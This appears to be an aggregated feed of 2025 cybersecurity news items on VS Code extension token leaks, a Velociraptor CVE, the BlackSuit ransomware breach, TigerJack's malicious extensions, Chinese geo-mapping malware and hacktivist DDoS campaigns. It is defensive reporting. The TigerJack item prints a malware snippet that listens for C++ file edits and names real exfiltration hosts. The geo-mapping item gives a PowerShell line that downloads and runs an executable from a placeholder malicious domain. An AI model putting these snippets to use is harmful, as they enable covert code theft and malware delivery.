• New research has uncovered that publishers of over 100 Visual Studio Code (VS Code) extensions leaked access tokens that could be exploited by bad actors to update the extensions, posing a critical software supply chain risk. “A leaked VSCode Marketplace or Open VSX PAT [personal access token] allows an attacker to directly distribute a malicious extension update across the entire install base,”

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • The Cybersecurity and Infrastructure Security Agency (CISA) issued an urgent alert on October 14, 2025, highlighting a critical vulnerability in Rapid7’s Velociraptor endpoint detection and response (EDR) tool.

    This flaw, stemming from incorrect default permissions, has already been weaponized by threat actors to execute arbitrary commands and seize control of infected endpoints, amplifying risks for organizations relying on the open-source security platform.

    Velociraptor, popular among security teams for its forensic capabilities and artifact collection, suffers from a misconfiguration that allows authenticated users with artifact collection privileges to escalate their access.

    According to CISA’s Known Exploited Vulnerabilities (KEV) catalog, exploitation requires initial access to the endpoint but can lead to full takeover once inside.

    The vulnerability ties to CVE-2025-6264, which addresses improper handling of permissions, making it a classic case of default settings gone awry.

    Rapid7 acknowledged the issue in a recent advisory, urging users to update to version 0.7.1 or later, where stricter permission controls have been implemented.

    What makes this vulnerability particularly alarming is its confirmed use in ransomware campaigns. Threat groups, including those linked to LockBit and Conti variants, have exploited it to pivot from initial footholds into devastating network-wide infections.

    Security researchers at Mandiant reported instances where attackers used Velociraptor’s own artifact-gathering features against defenders, injecting malicious payloads that evaded traditional detection.

    In one documented case from late September 2025, a mid-sized financial firm lost endpoint visibility entirely after ransomware operators commandeered the tool, leading to data exfiltration and encryption across 500 devices.

    This incident underscores a troubling trend: adversaries increasingly target security software itself. By compromising EDR platforms like Velociraptor, attackers not only neutralize defenses but also gain reconnaissance advantages.

    CISA emphasized that unpatched systems face heightened risks, especially in sectors like healthcare and critical infrastructure, where endpoint monitoring is vital.

    Mitigations

    CISA recommends applying Rapid7’s patches immediately, enforcing least-privilege access for artifact collection, and adhering to Binding Operational Directive (BOD) 22-01 for cloud-based services.

    If mitigations prove infeasible, discontinuing use of the affected product is advised. The agency set a due date of November 4, 2025, for federal agencies to address the vulnerability, signaling its severity.

    Experts warn that this exploit highlights the double-edged sword of open-source tools: powerful yet prone to configuration pitfalls.

    As ransomware evolves, blending social engineering with technical exploits, defenders must prioritize rigorous permission audits.

    Rapid7 has maintained its documentation with step-by-step hardening guides, but proactive monitoring remains key. With attacks surging 30% year-over-year per recent reports, this CISA warning serves as a call to fortify the very tools meant to protect us.

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post CISA Warns Of Rapid7 Velociraptor Vulnerability Exploited in Ransomware Attacks appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A major manufacturing company fell victim to a swift and devastating ransomware attack after threat actors gained access using just one set of stolen VPN credentials. The attack, carried out by the cybercrime group Ignoble Scorpius, culminated in widespread encryption of virtual machines and brought critical operations to a halt. The Initial Compromise The breach […]

    The post BlackSuit Ransomware Breaches Corporate Network Using Single Compromised VPN Credential appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • The BlackSuit ransomware group, tracked as Ignoble Scorpius by cybersecurity experts, devastated a prominent manufacturer’s operations.

    The attack, detailed in a recent Unit 42 report from Palo Alto Networks, began with something as simple as compromised VPN credentials, escalating into widespread encryption and data theft that could have cost millions.

    This incident underscores the escalating sophistication of ransomware actors and the urgent need for layered defenses in today’s threat landscape.

    The breach kicked off with a classic voice phishing scam, or vishing. An attacker posed as the company’s IT help desk, convincing an unwitting employee to input their real VPN login on a fake phishing site.

    Once inside, the intruder wasted no time. They launched a DCSync attack on a domain controller, siphoning off elite credentials like those of a key service account.

    From there, lateral movement was swift: using Remote Desktop Protocol (RDP) and Server Message Block (SMB), the hackers deployed tools such as Advanced IP Scanner to chart the network and SMBExec to exploit vulnerabilities.

    Persistence came next, with the attackers installing legitimate remote access software like AnyDesk alongside a custom remote access trojan (RAT) on a domain controller, disguised as a scheduled task to dodge reboots.

    They hit a second domain controller hard, dumping the NTDS.dit database full of password hashes. Over 400 GB of sensitive data vanished via a rebranded rclone tool.

    60+ VMware ESXi Hosts Breached

    To erase their footprints, they ran CCleaner before the knockout punch: BlackSuit ransomware, automated through Ansible playbooks, locked down hundreds of virtual machines across about 60 VMware ESXi hosts.

    Their probe revealed critical gaps, leading to targeted fixes: swapping outdated Cisco ASA firewalls for next-gen models, enforcing network segmentation, and limiting admin access to isolated VLANs.

    On identity fronts, they pushed multifactor authentication (MFA) for all remote logins, NTLM disabling, credential rotations, and bans on service accounts for interactive sessions like RDP.

    The client successfully avoided a $20 million ransom demand, thanks to Unit 42’s expertise, while also gaining enterprise-wide monitoring and ongoing managed detection services.

    This story shows a harsh truth: one stolen credential can cause a chain reaction of problems. Groups like Ignoble Scorpius take advantage of such mistakes, using simple tools and ransomware to create maximum disruption.

    Organizations need to prioritize multi-factor authentication, proactive assessments, and automated responses to effectively combat ransomware. As this threat evolves, it is essential to enhance defenses before the next vishing call leads to a similar outcome.

    Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

    The post BlackSuit Ransomware Actors Breached Corporate Environment, Including 60+ VMware ESXi Hosts appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • The Cybersecurity and Infrastructure Security Agency has added a critical vulnerability in Rapid7 Velociraptor to its Known Exploited Vulnerabilities catalogue, warning that threat actors are actively exploiting the flaw in ransomware attacks. The vulnerability, tracked as CVE-2025-6264, was added to the catalogue on October 14, 2025, giving federal agencies until November 4 to implement necessary […]

    The post CISA Alerts on Rapid7 Velociraptor Flaw Exploited in Ransomware Campaigns appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A newly discovered zero-day vulnerability in the Windows Agere Modem driver has been actively exploited by threat actors to elevate privileges on affected systems. Tracked as CVE-2025-24052 and CVE-2025-24990, these flaws allow a low-privileged user to gain full system control without any user interaction. Microsoft has released an October cumulative update that removes the vulnerable […]

    The post Windows Agere Modem Driver 0-Day Exploited in Active Privilege Escalation Attacks appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A sophisticated threat actor known as TigerJack has systematically infiltrated developer marketplaces with at least 11 malicious Visual Studio Code extensions, targeting thousands of unsuspecting developers worldwide.

    Operating under multiple publisher identities including ab-498, 498, and 498-00, this cybercriminal has deployed a comprehensive attack arsenal designed to steal source code, mine cryptocurrency, and establish remote backdoors for complete system control.

    The scale of this operation is staggering. Two of TigerJack’s most successful extensions, “C++ Playground” and “HTTP Format,” infected over 17,000 developers before Microsoft quietly removed them from their marketplace. However, the threat persists beyond the initial takedown.

    TigerJack’s git repository (Source – Koi)

    These malicious extensions remain fully operational in the OpenVSX marketplace, which powers popular IDE alternatives like Cursor and Windsurf, continuing their covert operations months after their removal from Microsoft’s platform.

    What makes this campaign particularly insidious is the sophisticated deception employed by the threat actor.

    The extensions deliver exactly the functionality they promise while simultaneously conducting malicious activities in the background.

    Developers installing these tools receive genuine utility – code compilation, error highlighting, and formatting capabilities – creating the perfect cover for the underlying malware operations.

    Koi analysts identified the malware’s sophisticated multi-layered approach during their comprehensive investigation.

    The threat actor employs a trojan horse strategy, initially publishing benign extensions to build trust and accumulate positive reviews before deploying malicious updates.

    This methodical approach allowed TigerJack to establish credibility within the developer community while positioning for large-scale intellectual property theft.

    Even as security researchers investigated this operation, TigerJack demonstrated remarkable persistence by launching a coordinated republication campaign.

    On September 17, 2025, five new extensions appeared simultaneously under the “498-00” publisher account, including a repackaged version of the original C++ Playground malware.

    TigerJack’s personal facebook account (Source – Koi)

    This systematic approach reveals an operation designed for longevity rather than opportunistic attacks.

    Code Theft Mechanism and Technical Implementation

    The technical sophistication of TigerJack’s code exfiltration mechanism exemplifies advanced malware engineering.

    The “C++ Playground” extension activates automatically through its onStartupFinished trigger and establishes a document change listener that monitors every C++ file within the developer’s workspace.

    The malware employs surgical precision, targeting only C++ files to avoid detection from developers working in other programming languages.

    Every keystroke triggers the malicious function after a carefully calibrated 500-millisecond delay – optimized to capture code in real-time while avoiding performance degradation that might alert users.

    The complete source code gets packaged into JSON payloads and transmitted to multiple exfiltration endpoints, including “ab498.pythonanywhere.com” and “api.codex.jaagrav.in.”

    The payload structure reveals the comprehensive scope of data theft, capturing not only the complete C++ source code but also processed versions and simulated input data.

    P.workspace.onDidChangeTextDocument((i) => {
        if (i.document &&
            i.document.languageId == "cpp" &&
            i.document?.uri.scheme == "file") {
            (j?.document.uri.toString() != mt.myfile &&
                (mt.myfile != i.document.uri.toString()) &&
                (Bt(i), (mt.myfile = i.document.uri.toString())))
        }
    })

    The exfiltrated data includes breakthrough algorithms, competitive advantages, thesis projects, and proprietary code – representing months or years of intellectual property theft.

    This mechanism operates invisibly alongside the extension’s legitimate functionality, making detection extremely challenging for individual developers who observe only the promised features while their most valuable digital assets are systematically stolen.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post TigerJack Hacks Infiltrated Developer Marketplaces with 11 Malicious VS Code Extensions appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • TLDR Even if you take nothing else away from this piece, if your organization is evaluating passkey deployments, it is insecure to deploy synced passkeys. Synced passkeys inherit the risk of the cloud accounts and recovery processes that protect them, which creates material enterprise exposure. Adversary-in-the-middle (AiTM) kits can force authentication fallbacks that circumvent strong

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • The emergence of a sophisticated malware campaign leveraging geo-mapping technology has put critical infrastructure and enterprise networks on high alert.

    First observed targeting sectors across Asia and North America, the malware was traced to a group of Chinese threat actors employing advanced stealth tactics to sustain prolonged network penetration.

    Attackers harnessed a unique blend of legitimate mapping utilities and customized remote access Trojans (RATs), allowing them to skirt detection and exploit geographic data for lateral movement within compromised environments.

    Initial infection occurred through spear-phishing emails laced with trojanized document attachments. The malicious payload, once activated, executed scripts that covertly downloaded mapping components and command modules from attacker-controlled servers.

    The infection chain embedded itself within trusted local services—often using digital certificates mimicking known vendors—thereby thwarting basic endpoint and network defenses.

    Breaches documented by Reliaquest researchers revealed an emphasis on blending into existing network traffic, with payloads engineered to appear as legitimate geographic information software updates or add-ons.

    Reliaquest analysts noted the malware’s remarkable longevity, with forensic traces showing persistence for over twelve months on several victim networks.

    Investigators highlighted the adversaries’ methodical use of geo-mapping metadata, which enabled targeted surveillance and resource mapping, helping attackers evade geofencing-based security controls and remain undetected for extended periods.

    Embedded Scripts and Custom RAT Deployment

    Central to the malware’s success was its flexible infection routine. The threat actors embedded PowerShell and VBScript code snippets into Microsoft Office documents, ensuring automatic execution upon opening.

    For example:-

    $payload = Invoke-WebRequest -Uri "http://maliciousdomain.com/geo-component.exe" -OutFile "C:\\temp\\geo.exe"
    Start-Process "C:\\temp\\geo.exe"

    This script downloads and launches the malicious geo-mapping executable, camouflaged as a software component. Once resident, the malware established persistence via scheduled tasks and registry keys.

    The custom RAT modules dynamically referenced local network maps, performing discovery operations and periodic beaconing to C2 infrastructure.

    GET request instructing the server to create a new directory (Source – Reliaquest)

    Here the ‘Malware Persistence Workflow,’ illustrates how these scheduled tasks and registry manipulations anchor the threat’s presence over time, ensuring attackers maintain access even after system reboots and basic remediation efforts.

    Security teams are urged to monitor for anomalous scheduling routines and network traffic involving mapping utilities, as these behaviors often precede extended compromises.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post Chinese Hackers Leverage Geo-Mapping Tool to Maintain Year-Long Persistence appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A sophisticated campaign orchestrated by multiple hacktivist groups has emerged, targeting government portals, financial services, and online commerce platforms across Israel and allied nations.

    The coordinated cyber offensive, timed around the October 7 anniversary, demonstrated unprecedented levels of organization and cross-ideological cooperation among geographically dispersed threat actors.

    The campaign peaked on October 7, 2025, with over 57 distributed denial-of-service attack claims recorded in a single day, representing a 14-fold increase from the September 2025 daily average.

    The multi-pronged assault involved several prominent hacktivist collectives, with Arabian Ghosts leading the charge by claiming responsibility for over 40% of all attack attempts.

    Supporting groups included Keymous+, OpIsrael, and notably, NoName057(16), a pro-Russian hacktivist collective that demonstrated the blurring of traditional geopolitical boundaries in cyber warfare.

    The participation of Russian-aligned actors in a predominantly pro-Palestinian campaign illustrates how shared adversaries can unite hacktivists from distinct ideological spheres, creating more resilient and far-reaching cyber coalitions.

    Radware analysts identified that most attacks remained short-lived but strategically focused on high-visibility targets across critical infrastructure sectors.

    The targeting pattern revealed a calculated approach to maximize public impact, with government websites accounting for the largest share of attack claims, followed by financial services institutions and online commerce platforms.

    Beyond these primary targets, the campaign extended to education, healthcare, manufacturing and retail sectors, each representing approximately 7% of total attack claims, suggesting opportunistic target selection designed to amplify perceived operational success.

    The attackers employed a sophisticated propaganda and coordination infrastructure, utilizing Telegram channels and social media platforms as real-time command centers.

    Groups like Sylhet Gang functioned primarily as propaganda orchestrators rather than direct operational actors, leveraging their extensive social media presence to amplify calls for coordinated action and mobilize affiliated networks.

    This approach proved highly effective, with the temporal correlation between public mobilization messages and subsequent attack waves demonstrating strong organizational capabilities within the hacktivist ecosystem.

    Attack Infrastructure and Persistence Mechanisms

    The campaign’s technical architecture revealed advanced coordination capabilities, with threat actors implementing multi-layered verification systems to substantiate their claims.

    Participating groups consistently shared check-host verification links as proof of successful disruptions, creating a transparent accountability mechanism that enhanced credibility within hacktivist communities.

    This verification approach represented a significant evolution from previous campaigns, where claims often lacked substantive technical evidence.

    NoName057(16) extended its operations beyond Israeli targets, conducting simultaneous attacks against German infrastructure while describing Germany as pro-Israeli in its messaging.

    DDoS attack claims per day targeting Israel between October 1 and 12, 2025 (Source – Radware)

    The group’s DDOSIA volunteer network facilitated crowdsourced attack capabilities, demonstrating how legitimate volunteering frameworks can be repurposed for coordinated cyber operations.

    Historical analysis of NoName057(16) operations shows consistent patterns of leveraging major geopolitical flashpoints to amplify visibility and reinforce ideological messaging, positioning the group as a persistent actor in information warfare campaigns.

    The campaign’s persistence mechanisms included server compromises across multiple jurisdictions, with Sylhet Gang claiming to have compromised dozens of Israeli, American and European servers.

    According to the group’s statements, they implemented multi-stage infection processes involving system defacement, proof-of-concept file uploads, data exfiltration, and malicious software installation.

    However, many of these claims remained unverifiable, highlighting the propaganda-focused nature of some participating groups rather than their technical sophistication.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post Pro-Russian Hacktivist Group Attacking Government Portals, Financial Services and Online Commerce appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶